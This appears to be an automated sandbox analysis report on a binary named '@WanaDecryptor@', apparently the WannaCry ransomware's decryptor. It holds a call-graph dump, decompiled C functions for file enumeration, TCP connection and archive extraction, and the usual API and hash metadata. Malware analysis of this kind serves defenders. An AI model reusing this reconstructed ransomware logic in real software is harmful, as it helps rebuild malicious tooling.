5855 409232 #5875 #6170 GetWindowOrgEx #540 #2818 5857 409329 GetObjectA 5855->5857 5858 40935b GetTextExtentPoint32A 5855->5858 5857->5858 5860 40938b GetViewportOrgEx 5858->5860 5864 409411 5860->5864 5861 409630 #800 5862 409662 5861->5862 5863 40965a #6170 5861->5863 5865 409685 #2414 #2414 5862->5865 5866 40967d #5875 5862->5866 5863->5862 5864->5861 5865->5852 5866->5865 5869 409880 #2414 5868->5869 5869->5855 6329 406ef0 6330 406f03 #823 6329->6330 6331 406f6a 6329->6331 6330->6331 6332 406f25 SendMessageA ShellExecuteA #825 6330->6332 6332->6331 6067 4011f0 6068 40120b #5280 6067->6068 6069 4011fd 6067->6069 6069->6068 6070 401203 6069->6070 6071 4019f0 #765 6072 401a08 6071->6072 6073 4019ff #825 6071->6073 6073->6072 6074 4059f0 6075 4059f8 6074->6075 6076 405a08 6075->6076 6077 4059ff #825 6075->6077 6077->6076 6492 4067f0 IsIconic 6493 406808 7 API calls 6492->6493 6494 40689a #2379 6492->6494 6495 409ff0 ExtTextOutA 6090 405580 GetClientRect 6091 4055c7 7 API calls 6090->6091 6092 4057c9 6090->6092 6093 405666 6091->6093 6094 405669 #5785 CreateSolidBrush FillRect 6091->6094 6093->6094 6095 405770 6 API calls 6094->6095 6098 4056b2 6094->6098 6095->6092 6097 4056cd BitBlt 6097->6098 6098->6095 6098->6097 5871 40d880 5874 40d0a0 time srand rand 5871->5874 5873 40d88f 5875 40d0e1 5874->5875 5876 40d0d3 rand 5874->5876 5875->5873 5876->5875 5876->5876 4756 40db80 recv 5877 405080 5882 4050a0 #800 #795 5877->5882 5879 405088 5880 405098 5879->5880 5881 40508f #825 5879->5881 5881->5880 5882->5879 6084 403180 6089 4031a0 #2414 #2414 #616 #693 #641 6084->6089 6086 403188 6087 403198 6086->6087 6088 40318f #825 6086->6088 6088->6087 6089->6086 6334 404280 6335 404290 6334->6335 6336 40428b 6334->6336 6338 4042a0 #6663 6335->6338 6339 4042fd #2379 6335->6339 6337 404530 5 API calls 6336->6337 6337->6335 6340 4042b5 GetParent #2864 SendMessageA #2379 6338->6340 6341 4042e7 ShellExecuteA 6338->6341 6341->6339 6099 408580 #609 6100 408598 6099->6100 6101 40858f #825 6099->6101 6101->6100 6544 409b80 6545 409b99 6544->6545 6546 409ba5 #2379 6545->6546 6547 409b9d 6545->6547 6496 406380 6501 405e10 #2414 #2414 #2414 #2414 6496->6501 6498 406388 6499 406398 6498->6499 6500 40638f #825 6498->6500 6500->6499 6530 403f20 #2414 6501->6530 6503 405ed6 6531 403f20 #2414 6503->6531 6505 405eec 6532 403f20 #2414 6505->6532 6507 405f02 6533 403f20 #2414 6507->6533 6509 405f18 #2414 6534 403f20 #2414 6509->6534 6511 405f50 6535 403f20 #2414 6511->6535 6513 405f66 6536 403f20 #2414 6513->6536 6515 405f7c 6 API calls 6537 4050a0 #800 #795 6515->6537 6517 405ffe 6538 4050a0 #800 #795 6517->6538 6519 40600e 6539 404170 #2414 #800 #800 #795 6519->6539 6521 40601e 6540 404170 #2414 #800 #800 #795 6521->6540 6523 40602e 6541 404170 #2414 #800 #800 #795 6523->6541 6525 40603e 6542 404170 #2414 #800 #800 #795 6525->6542 6527 40604e #654 #765 6543 405d90 #654 #765 6527->6543 6529 406087 #609 #609 #616 #641 6529->6498 6530->6503 6531->6505 6532->6507 6533->6509 6534->6511 6535->6513 6536->6515 6537->6517 6538->6519 6539->6521 6540->6523 6541->6525 6542->6527 6543->6529 5437 407a90 5438 407bf4 #2385 5437->5438 5439 407abd 5437->5439 5439->5438 5446 404c40 #324 #540 #860 5439->5446 5441 407ae2 #2514 5442 407b72 #2414 #2414 #800 #641 5441->5442 5443 407afb 6 API calls 5441->5443 5442->5438 5444 4082c0 141 API calls 5443->5444 5445 407b61 #800 5444->5445 5445->5442 5446->5441 6102 404d90 #2370 #2289 5883 401091 5888 4010c0 #765 #641 5883->5888 5885 4010a8 5886 4010b8 5885->5886 5887 4010af #825 5885->5887 5887->5886 5888->5885 6342 414290 #825 5897 40a0a0 5898 40a0a8 5897->5898 5899 40a0ab GrayStringA 5897->5899 5898->5899 4744 40d6a0 htons socket 4745 40d6f3 bind 4744->4745 4746 40d814 4744->4746 4747 40d717 ioctlsocket 4745->4747 4748 40d809 4745->4748 4747->4748 4749 40d732 connect select 4747->4749 4748->4746 4750 40d80d closesocket 4748->4750 4749->4748 4751 40d78b __WSAFDIsSet 4749->4751 4750->4746 4752 40d79a __WSAFDIsSet 4751->4752 4753 40d7ac ioctlsocket setsockopt setsockopt 4751->4753 4752->4748 4752->4753 4757 4063a0 15 API calls 5906 4034a0 6 API calls 6107 4035a0 SendMessageA 6108 4035e5 OpenClipboard 6107->6108 6109 4037e9 6107->6109 6108->6109 6110 4035f7 SendMessageA 6108->6110 6111 403681 GlobalAlloc 6110->6111 6112 40360f #3301 #924 #800 #800 SendMessageA 6110->6112 6113 4037e3 CloseClipboard 6111->6113 6114 40369b GlobalLock 6111->6114 6112->6111 6112->6112 6113->6109 6115 4036b6 SendMessageA 6114->6115 6116 4036aa GlobalFree 6114->6116 6117 4037c3 GlobalUnlock EmptyClipboard SetClipboardData 6115->6117 6118 4036d6 8 API calls 6115->6118 6116->6113 6117->6113 6120 4037bf 6118->6120 6120->6117 6349 40c6a0 6350 40c6b8 6349->6350 6351 40c6aa 6349->6351 6351->6350 6352 40c6be #825 6351->6352 6352->6350 6121 4085a0 #781 6122 4085b8 6121->6122 6123 4085af #825 6121->6123 6123->6122 5889 4098a0 5894 4097e0 5889->5894 5891 4098a8 5892 4098b8 5891->5892 5893 4098af #825 5891->5893 5893->5892 5895 409815 5894->5895 5896 40981e #2414 #2414 5894->5896 5895->5896 5896->5891 6353 404aa3 6354 404ab1 6353->6354 6355 404aaa GlobalFree 6353->6355 6356 404ac0 6354->6356 6357 404ab9 CloseHandle 6354->6357 6355->6354 6357->6356 5907 407cb0 5910 4030e0 #324 #567 #567 5907->5910 5909 407cd6 6 API calls 5910->5909 6124 407db0 6131 401000 #324 #567 6124->6131 6126 407dd7 time 6127 407e09 #2514 6126->6127 6128 407dfe 6126->6128 6129 407e34 #765 #641 6127->6129 6130 407e28 time 6127->6130 6128->6127 6130->6129 6131->6126 6358 40ceb0 6359 40cebc 6358->6359 6360 4130bb 2 API calls 6359->6360 6361 40ceda 6360->6361 5448 4102b0 calloc

                                  Executed Functions

                                  Function 004080C0 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 143fileCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 190 4080c0-40811e FindFirstFileA 191 408124-40812a 190->191 192 40820a-40828f call 401e30 * 2 sprintf #537 call 4082c0 190->192 194 408130-408138 191->194 208 408291-4082a9 #537 call 4082c0 192->208 209 4082ae-4082b8 192->209 196 4081e4-4081f9 FindNextFileA 194->196 197 40813e-408152 194->197 196->194 198 4081ff-408206 FindClose 196->198 197->196 200 408158-408176 sscanf 197->200 198->192 200->196 202 408178-40818e fopen 200->202 202->196 204 408190-4081a8 fread 202->204 206 4081aa-4081b7 204->206 207 4081bd-4081d0 fclose 204->207 206->207 210 4081b9 206->210 207->196 211 4081d2-4081e2 207->211 208->209 210->207 211->196
                                  C-Code - Quality: 87%
                                  			E004080C0(intOrPtr __ecx) {
				void _v999;
				char _v1000;
				void* _v1012;
				char _v1100;
				char _v1200;
				char _v1476;
				signed char _v1520;
				intOrPtr _v1648;
				void _v1656;
				intOrPtr _v1660;
				intOrPtr _v1664;
				intOrPtr _v1668;
				intOrPtr _v1672;
				intOrPtr _v1696;
				void _v1788;
				void _v1792;
				void* _v1796;
				char _v1800;
				intOrPtr _v1804;
				intOrPtr _v1808;
				void* _v1820;
				char _t44;
				void* _t47;
				void* _t50;
				void* _t54;
				int _t57;
				int _t60;
				struct _IO_FILE* _t61;
				int _t62;
				struct _WIN32_FIND_DATAA* _t74;
				intOrPtr _t103;
				void* _t104;
				struct _IO_FILE* _t105;
				void* _t110;
				intOrPtr _t113;
				void* _t114;
				void* _t126;

				_t103 = __ecx;
				memset( &_v1788, 0, 0x21 << 2);
				_t44 =  *0x421798; // 0x0
				_v1000 = _t44;
				_v1808 = _t103;
				memset( &_v999, 0, 0xf9 << 2);
				_t110 =  &_v1808 + 0x18;
				asm("stosw");
				_t74 =  &_v1520;
				_v1804 = 0;
				asm("stosb"); // executed
				_t47 = FindFirstFileA("*.res", _t74); // executed
				_v1796 = _t47;
				if(_t47 == 0xffffffff) {
					L13:
					_push(_v1804);
					_t50 = E00401E30(_t124, _t126, _v1672,  &_v1200);
					sprintf( &_v1000, "---\t%s\t%s\t%d\t%I64d\t%d", E00401E30(_t124, _t126, _v1696,  &_v1100), _t50, _v1668, _v1664, _v1660);
					_t113 = _t110 + 0x30;
					_push(0);
					_v1808 = _t113;
					L00412CAA();
					_t79 = _t103;
					_t54 = E004082C0(_t103,  &_v1000,  &_v1000);
					if(_t54 != 0xffffffff) {
						return _t54;
					}
					_push(0);
					 *((intOrPtr*)(_t113 + 0x18)) = _t113;
					L00412CAA();
					return E004082C0(_t103, _t113 + 0x340, _t79);
				} else {
					goto L2;
					L11:
					_t104 = _v1796;
					_t74 =  &_v1520;
					_t57 = FindNextFileA(_t104, _t74); // executed
					_t124 = _t57;
					if(_t57 != 0) {
						L2:
						if((_v1520 & 0x00000010) == 0) {
							asm("repne scasb");
							if( !(_t74 | 0xffffffff) - 1 == 0xc) {
								_t60 = sscanf( &_v1476, "%08X.res",  &_v1800);
								_t110 = _t110 + 0xc;
								if(_t60 >= 1) {
									_t61 = fopen( &_v1476, "rb"); // executed
									_t105 = _t61;
									_t110 = _t110 + 8;
									if(_t105 != 0) {
										_t62 = fread( &_v1656, 0x88, 1, _t105); // executed
										_t114 = _t110 + 0x10;
										if(_t62 == 1 && _v1648 == _v1800) {
											_v1804 = _v1804 + 1;
										}
										fclose(_t105); // executed
										_t110 = _t114 + 4;
										if(_v1648 == 0) {
											memcpy( &_v1792,  &_v1656, 0x22 << 2);
											_t110 = _t110 + 0xc;
										}
									}
								}
							}
						}
						goto L11;
					} else {
						FindClose(_t104);
						_t103 = _v1808;
						goto L13;
					}
				}
			}








































                                  0x004080c9
                                  0x004080d7
                                  0x004080d9
                                  0x004080e3
                                  0x004080f3
                                  0x004080f7
                                  0x004080f7
                                  0x004080f9
                                  0x004080fb
                                  0x00408102
                                  0x00408110
                                  0x00408111
                                  0x0040811a
                                  0x0040811e
                                  0x0040820a
                                  0x0040821c
                                  0x00408237
                                  0x00408266
                                  0x0040826c
                                  0x00408276
                                  0x0040827b
                                  0x00408280
                                  0x00408285
                                  0x00408287
                                  0x0040828f
                                  0x004082b8
                                  0x004082b8
                                  0x00408291
                                  0x0040829d
                                  0x004082a2
                                  0x00000000
                                  0x00408124
                                  0x0040812a
                                  0x004081e4
                                  0x004081e4
                                  0x004081e8
                                  0x004081f1
                                  0x004081f7
                                  0x004081f9
                                  0x00408130
                                  0x00408138
                                  0x0040814a
                                  0x00408152
                                  0x0040816a
                                  0x00408170
                                  0x00408176
                                  0x00408185
                                  0x00408187
                                  0x00408189
                                  0x0040818e
                                  0x004081a0
                                  0x004081a2
                                  0x004081a8
                                  0x004081b9
                                  0x004081b9
                                  0x004081be
                                  0x004081cb
                                  0x004081d0
                                  0x004081e2
                                  0x004081e2
                                  0x004081e2
                                  0x004081d0
                                  0x0040818e
                                  0x00408176
                                  0x00408152
                                  0x00000000
                                  0x004081ff
                                  0x00408200
                                  0x00408206
                                  0x00000000
                                  0x00408206
                                  0x004081f9

                                  APIs
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$#537File$CloseFirstNextfclosefopenfreadsprintfsscanf
                                  • String ID: %08X.res$*.res$---%s%s%d%I64d%d
                                  • API String ID: 1530363904-2310201135
                                  • Opcode ID: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction ID: f4d275e2d06bc6c2fe64a46714bc06f3fac9236f3415a442fab0096444624429
                                  • Opcode Fuzzy Hash: 246f558812f6a4b1f5d00500c0ea839226a98d7eebb8d8b9e36566a9c1167d01
                                  • Instruction Fuzzy Hash: F051B370604740ABD634CB24DD45BEF77E9EFC4314F00492EF98897291DB78AA098B9A
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 0040D6A0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120networkCOMMON
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 213 40d6a0-40d6ed htons socket 214 40d6f3-40d711 bind 213->214 215 40d814-40d821 213->215 216 40d717-40d72c ioctlsocket 214->216 217 40d809-40d80b 214->217 216->217 218 40d732-40d789 connect select 216->218 217->215 219 40d80d-40d80e closesocket 217->219 218->217 220 40d78b-40d798 __WSAFDIsSet 218->220 219->215 221 40d79a-40d7aa __WSAFDIsSet 220->221 222 40d7ac-40d806 ioctlsocket setsockopt * 2 220->222 221->217 221->222
                                  APIs
                                  • htons.WS2_32 ref: 0040D6C7
                                  • socket.WS2_32(00000002,00000001,00000006), ref: 0040D6E1
                                  • bind.WS2_32(00000000,?,00000010), ref: 0040D709
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D728
                                  • connect.WS2_32(00000000,?,00000010), ref: 0040D73A
                                  • select.WS2_32(00000001,?,?,00000000,00000001), ref: 0040D781
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D791
                                  • __WSAFDIsSet.WS2_32(00000000,?), ref: 0040D7A3
                                  • ioctlsocket.WS2_32(00000000,8004667E,?), ref: 0040D7BB
                                  • setsockopt.WS2_32(00000000), ref: 0040D7DD
                                  • setsockopt.WS2_32(00000000,0000FFFF,00001005,?,00000004), ref: 0040D7F1
                                  • closesocket.WS2_32(00000000), ref: 0040D80E
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000019.00000002.6616311976.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000019.00000002.6616230229.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616493853.0000000000415000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616646559.000000000041F000.00000008.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616747545.0000000000421000.00000004.00000001.01000000.00000008.sdmpDownload File
                                  • Associated: 00000019.00000002.6616822429.0000000000423000.00000002.00000001.01000000.00000008.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_25_2_400000_@WanaDecryptor@.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: ioctlsocketsetsockopt$bindclosesocketconnecthtonsselectsocket
                                  • String ID: `
                                  • API String ID: 478405425-1850852036
                                  • Opcode ID: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction ID: 6de462713d41b41c0891f3cf9d152f402d0f08cb5dc9382bbec9442f00cca922
                                  • Opcode Fuzzy Hash: 207a0d99be8aa74ddfaa5851ea6aa8d1a80ed73a610e947c43882b9ed202ce50
                                  • Instruction Fuzzy Hash: 83418372504341AED320DF55DC84EEFB7E8EFC8714F40892EF558D6290E7B495088BAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Function 00411CF0 Relevance: 21.4, APIs: 8, Strings: 4, Instructions: 450COMMONCrypto
                                  Download Yara Rule

                                  Control-flow Graph

                                  • Executed
                                  • Not Executed
                                  control_flow_graph 224 411cf0-411d0b 225 412231-41223f 224->225 226 411d11-411d16 224->226 226->225 227 411d1c-411d1f 226->227 228 411d21-411d27 call 411ac0 227->228 229 411d2a-411d35 227->229 228->229 231 411d37-411d39 229->231 232 411d5a-411d5c 229->232 234 411d3b-411d57 231->234 235 411d5e-411db2 231->235 232->235 236 411db5-411dba 232->236 237 411dc5-411dca 236->237 238 411dbc-411dc2 call 411390 236->238 239 411ddc-411e1a call 411350 call 411460 237->239 240 411dcc-411dda call 4113e0 237->240 238->237 249 411e2d-411e43 call 410a50 239->249 250 411e1c-411e2a 239->250 240->239 253 411e45-411e53 249->253 254 411e56-411e73 #823 call 410af0 249->254 256 411e78-411e81 254->256 257 411e83-411e9a #825 256->257 258 411e9d-411ed9 256->258 259 411ee0-411ee4 258->259 260 411ef0-411ef2 259->260 261 411ee6-411ee9 259->261 263 411ef4-411ef5 260->263 264 411ef7-411ef9 260->264 261->260 262 411eeb-411eee 261->262 262->259 263->259 265 411efb-411efc 264->265 266 411efe-411f0e _mbsstr 264->266 265->259 267 411f10-411f13 266->267 268 411f15-411f25 _mbsstr 266->268 267->259 269 411f27-411f2a 268->269 270 411f2c-411f3c _mbsstr 268->270 269->259 271 411f43-411f53 _mbsstr 270->271 272 411f3e-411f41 270->272 273 411f55-411f58 271->273 274 411f5a-411fa2 271->274 272->259 273->259 275 411fb3-411fda 274->275 276 411fa4-411fa7 274->276 278 411fdc-411fe6 275->278 276->275 277 411fa9-411fac 276->277 277->275 279 411fae-411fb1 277->279 280 411ff2-411ff4 278->280 281 411fe8 278->281 279->275 279->278 282 412004-41200a 280->282 283 411ff6-411ffe 280->283 281->280 284 41201a-41201c 282->284 285 41200c-412014 282->285 283->282 286 41202c-412037 284->286 287 41201e-412026 284->287 285->284 288 412039 286->288 289 41203f-4120b0 call 411b80 LocalFileTimeToFileTime 286->289 287->286 288->289 292 4121f2 289->292 293 4120b6-4120ba 289->293 295 4121f6-4121f8 292->295 294 4120bf-4120d3 293->294 296 4120d7-4120dd 294->296 297 412203-41222e 295->297 298 4121fa-412200 #825 295->298 299 4120fb-4120fd 296->299 300 4120df-4120e1 296->300 298->297 303 412100-412102 299->303 301 4120e3-4120eb 300->301 302 4120f7-4120f9 300->302 301->299 304 4120ed-4120f5 301->304 302->303 305 412104-412117 303->305 306 41211e-41213c 303->306 304->296 304->302 305->294 309 412119 305->309 307 412179-41217b 306->307 308 41213e-412173 call 411b50 306->308 311 4121b8-4121ba 307->311 312 41217d-4121b2 call 411b50 307->312 308->307 309->295 311->295 315 4121bc-4121f0 call 411b50 311->315 312->311 315->295
                                  C-Code - Quality: 91%
                                  			E00411CF0(intOrPtr* __ecx) {
				intOrPtr _t142;
				signed int _t147;
				signed int _t149;
				intOrPtr _t150;
				void* _t152;
				signed int _t157;
				signed int _t160;
				unsigned int _t162;
				signed char _t164;
				struct _FILETIME _t177;
				struct _FILETIME _t180;
				intOrPtr _t182;
				signed int _t186;
				signed char _t188;
				struct _FILETIME _t204;
				struct _FILETIME _t212;
				signed int _t215;
				signed int _t217;
				signed int _t219;
				intOrPtr* _t226;
				signed int _t231;
				signed int _t232;
				signed int _t234;
				signed int _t235;
				signed int _t239;
				unsigned int _t248;
				signed int _t249;
				int _t252;
				signed char _t264;
				intOrPtr _t269;
				intOrPtr* _t273;
				signed int _t276;
				unsigned int _t297;
				signed int _t299;
				intOrPtr _t300;
				signed int _t303;
				intOrPtr _t307;
				intOrPtr _t309;
				signed int _t311;
				intOrPtr _t312;
				intOrPtr _t313;
				intOrPtr* _t321;
				signed int _t329;
				intOrPtr* _t336;
				void* _t337;
				void* _t338;
				signed int _t340;
				signed int _t341;
				void* _t343;
				void* _t346;
				void* _t348;
				void* _t349;
				void* _t350;
				void* _t351;
				void* _t353;
				void* _t354;
				void* _t355;
				void* _t356;

				_t312 =  *((intOrPtr*)(_t348 + 0x294));
				_t232 = _t231 | 0xffffffff;
				_t336 = __ecx;
				 *((intOrPtr*)(_t348 + 0x1c)) = __ecx;
				if(_t312 < _t232) {
					L72:
					return 0x10000;
				} else {
					_t140 =  *__ecx;
					if(_t312 >=  *((intOrPtr*)( *__ecx + 4))) {
						goto L72;
					} else {
						if( *((intOrPtr*)(__ecx + 4)) != _t232) {
							E00411AC0(_t140);
							_t348 = _t348 + 4;
						}
						 *(_t336 + 4) = _t232;
						if(_t312 !=  *((intOrPtr*)(_t336 + 0x134))) {
							__eflags = _t312 - _t232;
							if(_t312 != _t232) {
								_t142 =  *_t336;
								__eflags = _t312 -  *((intOrPtr*)(_t142 + 0x10));
								if(_t312 <  *((intOrPtr*)(_t142 + 0x10))) {
									E00411390(_t142);
									_t348 = _t348 + 4;
								}
								_t143 =  *_t336;
								__eflags =  *( *_t336 + 0x10) - _t312;
								while(__eflags < 0) {
									E004113E0(_t143);
									_t143 =  *_t336;
									_t348 = _t348 + 4;
									__eflags =  *( *_t336 + 0x10) - _t312;
								}
								E00411350( *_t336, _t348 + 0x4c, _t348 + 0x98, 0x104, 0, 0, 0, 0);
								_t147 = E00411460(__eflags,  *_t336, _t348 + 0x58, _t348 + 0x40, _t348 + 0x30);
								_t349 = _t348 + 0x30;
								__eflags = _t147;
								if(_t147 == 0) {
									_t149 = E00410A50( *((intOrPtr*)( *_t336)),  *((intOrPtr*)(_t349 + 0x20)), 0);
									_t350 = _t349 + 0xc;
									__eflags = _t149;
									if(_t149 == 0) {
										_t150 =  *((intOrPtr*)(_t350 + 0x10));
										_push(_t150); // executed
										L00412CEC(); // executed
										_t313 = _t150;
										 *((intOrPtr*)(_t350 + 0x1c)) = _t313;
										_t152 = E00410AF0(_t313, 1,  *((intOrPtr*)(_t350 + 0x14)),  *((intOrPtr*)( *_t336)));
										_t351 = _t350 + 0x14;
										__eflags = _t152 -  *((intOrPtr*)(_t350 + 0x24));
										if(_t152 ==  *((intOrPtr*)(_t350 + 0x24))) {
											_t346 =  *(_t351 + 0x29c);
											asm("repne scasb");
											_t248 =  !_t232;
											 *_t346 =  *( *_t336 + 0x10);
											_t337 = _t351 + 0x88 - _t248;
											_t249 = _t248 >> 2;
											_t252 = memcpy(_t351 + 0x190, _t337, _t249 << 2) & 0x00000003;
											__eflags = _t252;
											memcpy(_t337 + _t249 + _t249, _t337, _t252);
											_t353 = _t351 + 0x18;
											_t321 = _t353 + 0x190;
											while(1) {
												_t157 =  *_t321;
												__eflags = _t157;
												if(_t157 == 0) {
													goto L23;
												}
												L21:
												__eflags =  *((intOrPtr*)(_t321 + 1)) - 0x3a;
												if( *((intOrPtr*)(_t321 + 1)) == 0x3a) {
													_t321 = _t321 + 2;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												L23:
												__eflags = _t157 - 0x5c;
												if(_t157 == 0x5c) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												__eflags = _t157 - 0x2f;
												if(_t157 == 0x2f) {
													_t321 = _t321 + 1;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t41 = _t157 + 4; // 0x4
													_t321 = _t41;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("\\../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t42 = _t157 + 4; // 0x4
													_t321 = _t42;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
												}
												_push("/../");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t43 = _t157 + 4; // 0x4
													_t321 = _t43;
													while(1) {
														_t157 =  *_t321;
														__eflags = _t157;
														if(_t157 == 0) {
															goto L23;
														}
														goto L21;
													}
													goto L23;
												}
												_push("/..\\");
												_push(_t321);
												L004132C4();
												_t353 = _t353 + 8;
												__eflags = _t157;
												if(_t157 != 0) {
													_t44 = _t157 + 4; // 0x4
													_t321 = _t44;
													continue;
												}
												asm("repne scasb");
												_t338 = _t321 -  !0xffffffff;
												_t297 =  *(_t353 + 0x70);
												_t160 = memcpy(_t346 + 4, _t338,  !0xffffffff >> 2 << 2);
												_t354 = _t353 + 0xc;
												 *((char*)(_t354 + 0x13)) = 0;
												_t162 = memcpy(_t338 + 0x175b75a, _t338, _t160 & 0x00000003);
												_t355 = _t354 + 0xc;
												_t164 = _t162 >> 0x0000001e & 0x00000001;
												_t264 =  !(_t297 >> 0x17) & 0x00000001;
												_t340 =  *(_t355 + 0x3c) >> 8;
												__eflags = _t340;
												 *(_t355 + 0x12) = 0;
												_t234 = 1;
												if(_t340 == 0) {
													L39:
													_t264 = _t297 & 0x00000001;
													 *(_t355 + 0x13) = _t297 >> 0x00000001 & 0x00000001;
													 *(_t355 + 0x12) = _t297 >> 0x00000002 & 0x00000001;
													_t164 = _t297 >> 0x00000004 & 0x00000001;
													_t299 = _t297 >> 0x00000005 & 0x00000001;
													__eflags = _t299;
													_t234 = _t299;
												} else {
													__eflags = _t340 - 7;
													if(_t340 == 7) {
														goto L39;
													} else {
														__eflags = _t340 - 0xb;
														if(_t340 == 0xb) {
															goto L39;
														} else {
															__eflags = _t340 - 0xe;
															if(_t340 == 0xe) {
																goto L39;
															}
														}
													}
												}
												_t341 = 0;
												__eflags = _t164;
												 *(_t346 + 0x108) = 0;
												if(_t164 != 0) {
													 *(_t346 + 0x108) = 0x10;
												}
												__eflags = _t234;
												if(_t234 != 0) {
													_t219 =  *(_t346 + 0x108) | 0x00000020;
													__eflags = _t219;
													 *(_t346 + 0x108) = _t219;
												}
												__eflags =  *(_t355 + 0x13);
												if( *(_t355 + 0x13) != 0) {
													_t217 =  *(_t346 + 0x108) | 0x00000002;
													__eflags = _t217;
													 *(_t346 + 0x108) = _t217;
												}
												__eflags = _t264;
												if(_t264 != 0) {
													_t215 =  *(_t346 + 0x108) | 0x00000001;
													__eflags = _t215;
													 *(_t346 + 0x108) = _t215;
												}
												__eflags =  *(_t355 + 0x12);
												if( *(_t355 + 0x12) != 0) {
													_t63 = _t346 + 0x108;
													 *_t63 =  *(_t346 + 0x108) | 0x00000004;
													__eflags =  *_t63;
												}
												_t300 =  *((intOrPtr*)(_t355 + 0x58));
												 *((intOrPtr*)(_t346 + 0x124)) =  *((intOrPtr*)(_t355 + 0x54));
												 *((intOrPtr*)(_t346 + 0x128)) = _t300;
												_t177 = E00411B80( *(_t355 + 0x4c) >> 0x10,  *(_t355 + 0x4c));
												_t356 = _t355 + 8;
												 *(_t356 + 0x30) = _t177;
												 *((intOrPtr*)(_t356 + 0x3c)) = _t300;
												LocalFileTimeToFileTime(_t356 + 0x30, _t356 + 0x28);
												_t180 =  *(_t356 + 0x28);
												_t269 =  *((intOrPtr*)(_t356 + 0x2c));
												 *(_t346 + 0x10c) = _t180;
												 *(_t346 + 0x114) = _t180;
												 *(_t346 + 0x11c) = _t180;
												__eflags =  *((intOrPtr*)(_t356 + 0x14)) - 4;
												 *((intOrPtr*)(_t346 + 0x110)) = _t269;
												 *((intOrPtr*)(_t346 + 0x118)) = _t269;
												 *((intOrPtr*)(_t346 + 0x120)) = _t269;
												if( *((intOrPtr*)(_t356 + 0x14)) <= 4) {
													_t329 =  *(_t356 + 0x1c);
												} else {
													_t329 =  *(_t356 + 0x1c);
													 *((char*)(_t356 + 0x1a)) = 0;
													do {
														 *((char*)(_t356 + 0x19)) =  *((intOrPtr*)(_t329 + _t341 + 1));
														 *(_t356 + 0x18) =  *((intOrPtr*)(_t341 + _t329));
														_t273 = "UT";
														_t186 = _t356 + 0x18;
														while(1) {
															_t235 =  *_t186;
															_t303 = _t235;
															__eflags = _t235 -  *_t273;
															if(_t235 !=  *_t273) {
																break;
															}
															__eflags = _t303;
															if(_t303 == 0) {
																L57:
																_t186 = 0;
															} else {
																_t239 =  *((intOrPtr*)(_t186 + 1));
																_t311 = _t239;
																_t92 = _t273 + 1; // 0x2f000054
																__eflags = _t239 -  *_t92;
																if(_t239 !=  *_t92) {
																	break;
																} else {
																	_t186 = _t186 + 2;
																	_t273 = _t273 + 2;
																	__eflags = _t311;
																	if(_t311 != 0) {
																		continue;
																	} else {
																		goto L57;
																	}
																}
															}
															L59:
															__eflags = _t186;
															if(_t186 == 0) {
																_t188 =  *((intOrPtr*)(_t341 + _t329 + 4));
																_t343 = _t341 + 5;
																_t276 = 1;
																__eflags = _t188 & 0x00000001;
																 *((char*)(_t356 + 0x12)) = 1;
																if((_t188 & 0x00000001) != 0) {
																	_t309 =  *((intOrPtr*)(_t343 + _t329));
																	_t343 = _t343 + 4;
																	__eflags = 0 << 8;
																	_t212 = E00411B50(_t309, 0 << 8 << 8);
																	_t276 =  *((intOrPtr*)(_t356 + 0x16));
																	 *(_t346 + 0x11c) = _t212;
																	_t356 = _t356 + 4;
																	 *((intOrPtr*)(_t346 + 0x120)) = 0;
																}
